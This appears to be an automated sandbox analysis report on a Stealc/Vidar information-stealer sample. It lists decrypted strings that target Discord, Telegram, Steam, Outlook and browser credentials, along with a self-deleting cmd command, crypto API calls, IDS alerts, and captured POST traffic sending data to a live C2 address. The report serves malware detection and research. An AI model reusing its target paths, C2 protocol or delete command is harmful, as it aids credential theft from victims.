                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - CPU:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Threads:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Cores:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - RAM:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - Display Resolution:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: - GPU:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: User Agents:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Installed Apps:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: All Users:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Current User:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Process List:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: system_info.txt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: freebl3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: mozglue.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: msvcp140.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: nss3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: softokn3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: vcruntime140.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Temp\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: .exe
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: runas
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: open
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: /c start
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %DESKTOP%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %APPDATA%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %LOCALAPPDATA%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %USERPROFILE%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %DOCUMENTS%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %PROGRAMFILES%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %PROGRAMFILES_86%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: %RECENT%
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: *.lnk
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: files
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \discord\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Local Storage\leveldb
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Telegram Desktop\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: key_datas
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: D877F783D5D3EF8C*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: map*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: A7FDF864FBC10B77*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: A92DAA6EA6F891F2*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: F8806DD0C461824F*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Telegram
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: *.tox
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: *.ini
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Password
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: 00000001
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: 00000002
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: 00000003
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: 00000004
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Outlook\accounts.txt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Pidgin
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \.purple\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: accounts.xml
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: dQw4w9WgXcQ
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: token:
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Software\Valve\Steam
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: SteamPath
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \config\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ssfn*
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: config.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DialogConfig.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: libraryfolders.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: loginusers.vdf
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Steam\
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: sqlite3.dll
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: browsers
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: done
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: soft
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: \Discord\tokens.txt
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: https
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: POST
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: HTTP/1.1
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: Content-Disposition: form-data; name="
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: hwid
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: build
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: token
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: file_name
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: file
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: message
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                        Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack String decryptor: screenshot.jpg
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02759540 CryptUnprotectData,LocalAlloc,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0275BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02756C10 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_027594A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02765590 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C2B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C40A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C404440 PK11_PrivDecrypt,
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                        Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                        Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                        Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0275B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0275DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02761B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02762570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0275D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_027515C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02761650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,PR_IsNetAddrType,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0275D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_027621F0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

                        Networking

                        Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.4:49731 -> 23.88.106.134:80
                        Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.4:49731 -> 23.88.106.134:80
                        Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 23.88.106.134:80 -> 192.168.2.4:49731
                        Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.4:49731 -> 23.88.106.134:80
                        Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 23.88.106.134:80 -> 192.168.2.4:49731
                        Source: Malware configuration extractor URLs: http://23.88.106.134/6a9f8e2503d99c04.php
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:00 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:04 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:05 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:06 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:06 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:07 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 08 Jun 2024 18:22:07 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAE Host: 23.88.106.134 Content-Length: 213 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------JJEGIJEGDBFHDGCAFCAE Content-Disposition: form-data; name="hwid" 8C19607774CC661179348 ------JJEGIJEGDBFHDGCAFCAE Content-Disposition: form-data; name="build" cuapfss ------JJEGIJEGDBFHDGCAFCAE--
                        Source: global traffic HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGHJEBFBFHIIECAECGH Host: 23.88.106.134 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------HDGHJEBFBFHIIECAECGH Content-Disposition: form-data; name="token" 7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b ------HDGHJEBFBFHIIECAECGH Content-Disposition: form-data; name="message" browsers ------HDGHJEBFBFHIIECAECGH--
                        Source: global traffic HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE Host: 23.88.106.134 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------HCAFIJDGHCBFHJKFCGIE Content-Disposition: form-data; name="token" 7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b ------HCAFIJDGHCBFHJKFCGIE Content-Disposition: form-data; name="message" plugins ------HCAFIJDGHCBFHJKFCGIE--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 23.88.106.134Content-Length: 6767Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJJDHIDBGHIDHIDAFBHost: 23.88.106.134Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 23.88.106.134Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJEHost: 23.88.106.134Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Ascii: ------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------EGIDBFBFHJDGCAKEGHJEContent-Disposition: form-data; name="file"------EGIDBFBFHJDGCAKEGHJE--
